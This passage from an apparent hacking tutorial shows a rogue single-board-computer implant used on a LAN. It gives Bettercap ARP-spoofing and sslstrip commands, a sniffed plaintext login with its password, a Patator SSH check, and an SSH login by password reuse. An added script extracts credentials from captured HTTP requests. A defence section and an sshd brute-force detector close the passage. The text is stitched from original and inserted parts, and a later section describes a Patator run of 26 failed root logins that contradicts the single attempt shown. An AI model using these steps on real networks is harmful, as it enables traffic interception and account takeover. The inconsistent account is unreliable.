http-req-dump/http-req-dump           /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap          591 B
http-ui                               /usr/local/share/bettercap/caplets/http-ui.cap                              382 B
https-ui                              /usr/local/share/bettercap/caplets/https-ui.cap                             661 B
jsinject/jsinject                     /usr/local/share/bettercap/caplets/jsinject/jsinject.cap                    210 B
local-sniffer                         /usr/local/share/bettercap/caplets/local-sniffer.cap                        244 B
login-manager-abuse/login-man-abuse   /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap  236 B
mana                                  /usr/local/share/bettercap/caplets/mana.cap                                 61 B
massdeauth                            /usr/local/share/bettercap/caplets/massdeauth.cap                           302 B
mitm6                                 /usr/local/share/bettercap/caplets/mitm6.cap                                551 B
netmon                                /usr/local/share/bettercap/caplets/netmon.cap                               42 B
pita                                  /usr/local/share/bettercap/caplets/pita.cap                                 900 B
proxy-script-test/proxy-script-test   /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap  57 B
rogue-mysql-server                    /usr/local/share/bettercap/caplets/rogue-mysql-server.cap                   501 B
rtfm/rtfm                             /usr/local/share/bettercap/caplets/rtfm/rtfm.cap                            210 B
simple-passwords-sniffer              /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap             131 B
tcp-req-dump/tcp-req-dump             /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap            413 B
web-override/web-override             /usr/local/share/bettercap/caplets/web-override/web-override.cap            254 B

To quickly enumerate active hosts on the network, load the netmon caplet with the include command.

10.#.#.#/24 > 10.#.#.##  » include netmon

IP              MAC                 Name         Vendor                       Sent    Recvd    Seen
192.168.8.138   XX:XX:XX:XX:XX:XX   eth0                                      0 B     0 B      21:18:37
192.168.8.1     XX:XX:XX:XX:XX:XX   gateway      Mediabridge Products, LLC.   19 kB   8.6 kB   21:18:37
192.168.8.179   XX:XX:XX:XX:XX:XX                Sony Corporation             32 kB   128 kB   21:20:24
192.168.8.193   XX:XX:XX:XX:XX:XX   Windows 10                                916 B   1.3 kB   21:20:20

↑ 54 kB / ↓ 433 kB / 4310 pkts

Alternatively, traffic passing between devices on the network can be sniffed by running the following six commands in order.

10.#.#.#/24 > 10.#.#.##  » set http.proxy.sslstrip true
10.#.#.#/24 > 10.#.#.##  » set arp.spoof.internal true
10.#.#.#/24 > 10.#.#.##  » set net.sniff.verbose false
10.#.#.#/24 > 10.#.#.##  » net.sniff on
10.#.#.#/24 > 10.#.#.##  » http.proxy on
10.#.#.#/24 > 10.#.#.##  » arp.spoof on

The first setting tells the HTTP proxy to downgrade HTTPS links to HTTP where it can (sslstrip); this only works against sites the browser is willing to load over plain HTTP, so hosts with HSTS, and especially preloaded ones, are not affected. Setting arp.spoof.internal to true makes Bettercap poison traffic between hosts on the LAN as well as traffic between hosts and the gateway, which is what lets the implant see the Windows client talk to a server on the same subnet. The remaining commands quiet the sniffer's output and start the sniffer, the proxy, and the ARP spoofer. Bettercap will then begin to display a great deal of data transiting the network.
In some cases, there are servers and services on the network that don't support HTTPS, or don't use it by default. These are prime targets for tools like Bettercap. Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices.

POST /media_server/Users/authenticatebyname HTTP/1.1
Host: 192.168.8.183:8096
Accept-Encoding: gzip, deflate
X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"
Content-Length: 46
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Referer: http://192.168.8.183:8096/web/index.html
Content-Type: application/json
Origin: http://192.168.8.183:8096
Accept: application/json
Accept-Language: en-US,en;q=0.5

{ "Username": "tokyoneon", "Pw": "secure_password-321" }

Bettercap displays the username and password found in the login request. These credentials can be used to pivot to other services, for example the SSH server discovered earlier on the very same host, 192.168.8.183. Now that the attacker has some sense of the target's preferred username and password scheme, they can test the credentials against other services on the network.

root@orangepizero:~# cd /opt/patator/
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password='secure_password-321' -t 1
INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 0     39     0.117 |                                    |     1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s

This time Patator didn't return an "Authentication failed" message: the result code is 0 and the mesg column carries the server's banner, which is what a successful ssh_login attempt looks like. That is a strong indication the password is correct.
The same username and password can now be used to log into the SSH server, a straightforward password-reuse attack.

root@orangepizero:/opt/patator# cd
root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183
The authenticity of host '192.168.8.183 (192.168.8.183)' can't be established.
ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc.
Are you sure you want to continue connecting (yes/no)? yes
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1
tokyoneon@ubuntu:~$
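Bettercap's simple-passwords-sniffer caplet pulls credentials out of traffic with loose regular expressions. The script below, added here as an example (it is not Bettercap code and not from the original article), does the same job for a captured request by parsing it properly: it handles the JSON login body shown above and, going beyond what the page shows, form-encoded bodies and HTTP Basic credentials as well. SAMPLE_REQUEST is a reconstruction of the sniffed media-server login with the same headers and field names; its Content-Length is computed from the body, because the page's rendering reflowed the original. Decoding the DeviceId header value is an observation about this particular capture, not anything the page or the media server documents.

```python
"""Extract login credentials from a plaintext HTTP request sniffed by the implant.

Added example for this article; it is not Bettercap code and not from the
original post. SAMPLE_REQUEST is a reconstruction of the captured media-server
login above (same headers and field names; Content-Length computed here).
Besides the JSON body on the page, the extractor also understands form-encoded
bodies and HTTP Basic credentials. Decoding DeviceId is an observation about
this capture, not documented behaviour.
"""
import base64
import json
import re
from urllib.parse import parse_qs

# Field names that commonly carry a username or password in login requests.
CRED_KEYS = {"username", "user", "login", "email", "pw", "password", "pass", "passwd"}

_BODY = '{"Username":"tokyoneon","Pw":"secure_password-321"}'
SAMPLE_REQUEST = (
    "POST /media_server/Users/authenticatebyname HTTP/1.1\r\n"
    "Host: 192.168.8.183:8096\r\n"
    'X-media-Authorization: MediaBrowser Device="Firefox", '
    'DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkg'
    'R2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"\r\n'
    "Content-Type: application/json\r\n"
    f"Content-Length: {len(_BODY)}\r\n"
    "Origin: http://192.168.8.183:8096\r\n"
    "\r\n" + _BODY
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased; the body is truncated to Content-Length."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return method, path, headers, body[:length]


def extract_credentials(raw):
    """Return {'host', 'path', 'fields'}; fields holds every credential-looking
    key/value found in a JSON or form body or in a Basic Authorization header."""
    _method, path, headers, body = parse_request(raw)
    fields = {}
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "application/json":
        try:
            data = json.loads(body)
        except ValueError:
            data = {}
        if isinstance(data, dict):
            fields = {k: v for k, v in data.items() if k.lower() in CRED_KEYS}
    elif ctype == "application/x-www-form-urlencoded":
        fields = {k: v[0] for k, v in parse_qs(body).items() if k.lower() in CRED_KEYS}
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user, _, pw = base64.b64decode(auth[6:]).decode("utf-8", "replace").partition(":")
            fields.update({"username": user, "password": pw})
        except ValueError:  # binascii.Error is a ValueError subclass: malformed base64
            pass
    return {"host": headers.get("host"), "path": path, "fields": fields}


def decode_device_id(raw):
    """The media server's DeviceId looks base64-encoded; return the decoded text
    or None. (An observation about this capture, not documented behaviour.)"""
    _m, _p, headers, _b = parse_request(raw)
    m = re.search(r'DeviceId="([^"]+)"', headers.get("x-media-authorization", ""))
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    print(extract_credentials(SAMPLE_REQUEST))
    print(decode_device_id(SAMPLE_REQUEST))
```

Feed it the request text that Bettercap (or tcpdump -A on the implant) printed; the sniffed DeviceId decodes to the browser's user agent plus a timestamp, which tells the attacker which client machine to go after next.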

How to Protect Yourself Against Network Implant Attacks

Enable HTTPS: The media server on the network didn't support HTTPS, which let the attacker read the login credentials with Bettercap. HTTPS and other encrypted protocols go a long way toward limiting what an attacker with a foothold on the LAN can harvest and reuse.

Use password managers: The attacker in this example reused the media server password on the SSH server. A password manager makes a unique password per service practical, which would have kept the media-server credential from opening the Ubuntu machine. Reusing passwords across online accounts, servers, and operating systems is always a bad idea. For SSH in particular, switching to key-based authentication and disabling password logins removes both the brute-force and the reuse path entirely.

Disable DHCP: This attack relies on the router issuing an IP address to the Orange Pi Zero when it's implanted. Without an address, Tor, and with it the attacker's remote access, can't reach the internet. Disabling DHCP only creates an obstacle, however: an attacker can watch the segment's traffic to work out the address range and netmask and configure a static address, and if they are still in the area they can use the Orange Pi Zero's Wi-Fi hotspot to identify the IP and netmask scheme manually.

Be alert: Be mindful of the people and devices authenticated to the router you're connecting to, and inspect the devices physically attached to the router from time to time. This is especially important for router administrators operating in public areas like coffee shops, hospitals, and libraries; public networks like these are prime targets for hackers looking to compromise as many people and services as possible.

Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and to deploy cheap SBCs during pentesting engagements. Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. As always, leave a comment below or message me on Twitter if you have any questions.
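The Patator run earlier in this article (26 failed root logins in 51 seconds from the implant's address) and the password-reuse login that followed it both leave a recognisable trace in sshd's log on the target, which is the host-side counterpart to the advice above. The script below is added here as an example; it is not code from the article or from any tool it uses. It reads sshd lines in the format Ubuntu writes to /var/log/auth.log, flags any address that accumulates a burst of failed passwords inside a sliding window, and then flags a successful login from an address that was already flagged. The log lines are constructed; the thresholds (10 failures inside 60 seconds) and the year supplied to complete syslog timestamps are assumptions to tune for your environment.

```python
"""Flag, in sshd's log, what this article's implant did to the Ubuntu host:
a burst of failed passwords from one address (the Patator run) followed by a
successful password login from that same address (the reused credential).

Added example for this article; not code from the post or from any tool it
uses. SAMPLE_LOG is constructed in the format sshd writes to /var/log/auth.log
on Ubuntu; the thresholds (10 failures inside 60 seconds) and the year used to
complete syslog timestamps are assumptions to tune for your environment.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

# Constructed sample: 12 failures for root two seconds apart from the implant's
# address, one unrelated failure from another host, a line the regex ignores,
# and finally the Accepted login with the password sniffed from the media server.
SAMPLE_LOG = [
    f"Apr 15 07:25:{10 + 2 * i:02d} ubuntu sshd[{1200 + i}]: Failed password for root "
    f"from 192.168.8.138 port {51000 + i} ssh2"
    for i in range(12)
] + [
    "Apr 15 07:25:40 ubuntu sshd[1300]: Failed password for invalid user bob from 192.168.8.179 port 40000 ssh2",
    "Apr 15 07:27:14 ubuntu sshd[1400]: Accepted password for tokyoneon from 192.168.8.138 port 51300 ssh2",
    "Apr 15 07:27:14 ubuntu sshd[1400]: pam_unix(sshd:session): session opened for user tokyoneon by (uid=0)",
]


def parse_line(line, year=2019):
    """Return a dict for Failed/Accepted sshd lines, or None for anything else.
    syslog timestamps carry no year, so one is supplied to build a datetime."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect(lines, threshold=10, window=60, year=2019):
    """Scan log lines in order and return alerts as tuples:
      ('bruteforce', ip, n)                 n failures from ip inside `window` seconds
      ('login-after-bruteforce', ip, user)  a flagged ip later authenticated successfully
    Each ip is reported as brute-forcing at most once."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line, year)
        if ev is None:
            continue
        if ev["result"] == "Failed":
            q = recent[ev["ip"]]
            q.append(ev["ts"])
            while (ev["ts"] - q[0]).total_seconds() > window:   # drop stale failures
                q.popleft()
            if len(q) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append(("bruteforce", ev["ip"], len(q)))
        elif ev["ip"] in flagged:   # an Accepted login from a brute-forcing address
            alerts.append(("login-after-bruteforce", ev["ip"], ev["user"]))
    return alerts


if __name__ == "__main__":
    # Real use (assumed path): detect(open("/var/log/auth.log"))
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

A tool such as fail2ban implements the first alert and bans the address; the second alert is the one worth paging on, because a login that succeeds right after a burst of failures is exactly what a reused or guessed password looks like from the server's side.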
